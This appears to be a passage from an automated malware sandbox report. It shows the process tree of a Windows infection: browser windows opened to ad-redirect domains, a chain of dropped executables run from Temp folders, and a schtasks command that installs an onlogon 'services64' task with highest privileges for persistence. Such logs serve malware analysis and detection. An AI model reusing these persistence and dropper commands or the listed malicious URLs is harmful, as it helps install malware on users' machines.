C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:110⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5516 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5300 /prefetch:810⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:110⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1396 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xc8,0x11c,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x84,0x10c,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe8,0xec,0xb8,0xe4,0xe0,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Users\Admin\AppData\Local\Temp\88-1edf1-bd5-6ecb4-7c38e55da0d7d\Lerawaesoqy.exe"C:\Users\Admin\AppData\Local\Temp\88-1edf1-bd5-6ecb4-7c38e55da0d7d\Lerawaesoqy.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agw0cspa.j20\LivelyScreenRecL14.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\agw0cspa.j20\LivelyScreenRecL14.exeC:\Users\Admin\AppData\Local\Temp\agw0cspa.j20\LivelyScreenRecL14.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exe12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp6A87_tmp.exe12⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4muwonpa.c4u\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4muwonpa.c4u\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4muwonpa.c4u\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 28411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uakgiqx2.oog\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\uakgiqx2.oog\installer.exeC:\Users\Admin\AppData\Local\Temp\uakgiqx2.oog\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uakgiqx2.oog\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uakgiqx2.oog\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631474222 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a4r5a25u.v42\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\a4r5a25u.v42\anyname.exeC:\Users\Admin\AppData\Local\Temp\a4r5a25u.v42\anyname.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqmm3uhp.rqm\BsInstFile.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\aqmm3uhp.rqm\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\aqmm3uhp.rqm\BsInstFile.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3064217.scr"C:\Users\Admin\AppData\Roaming\3064217.scr" /S11⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5660 -s 212812⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5660 -s 212812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3457138.scr"C:\Users\Admin\AppData\Roaming\3457138.scr" /S11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5193763.scr"C:\Users\Admin\AppData\Roaming\5193763.scr" /S11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vo2tcui1.11s\ShadowVPNInstaller_v3.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\vo2tcui1.11s\ShadowVPNInstaller_v3.exeC:\Users\Admin\AppData\Local\Temp\vo2tcui1.11s\ShadowVPNInstaller_v3.exe10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 27211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 59211⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 60011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 62811⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 63211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 73211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rcrdifgb.o3s\askinstall52.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\rcrdifgb.o3s\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\rcrdifgb.o3s\askinstall52.exe10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 176411⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5fqsrw0.md1\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\q5fqsrw0.md1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\q5fqsrw0.md1\gcleaner.exe /mixfive10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bhzsed2s.idv\Text.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\bhzsed2s.idv\Text.exeC:\Users\Admin\AppData\Local\Temp\bhzsed2s.idv\Text.exe10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpF284_tmp.exe12⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e51xkzw0.aib\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18e9d20a66425675c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18e9d20a66425675c.exeTue18e9d20a66425675c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 2646⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18aad7323f1b89d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18aad7323f1b89d.exeTue18aad7323f1b89d.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2178461.scr"C:\Users\Admin\AppData\Roaming\2178461.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5188 -s 21287⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5834117.scr"C:\Users\Admin\AppData\Roaming\5834117.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3051250.scr"C:\Users\Admin\AppData\Roaming\3051250.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3976244.scr"C:\Users\Admin\AppData\Roaming\3976244.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue188c50114d1a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue188c50114d1a.exeTue188c50114d1a.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue188c50114d1a.exeC:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue188c50114d1a.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1807ec103e6254c2f.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue1807ec103e6254c2f.exeTue1807ec103e6254c2f.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 2846⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18bd83aee63.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18bd83aee63.exeTue18bd83aee63.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
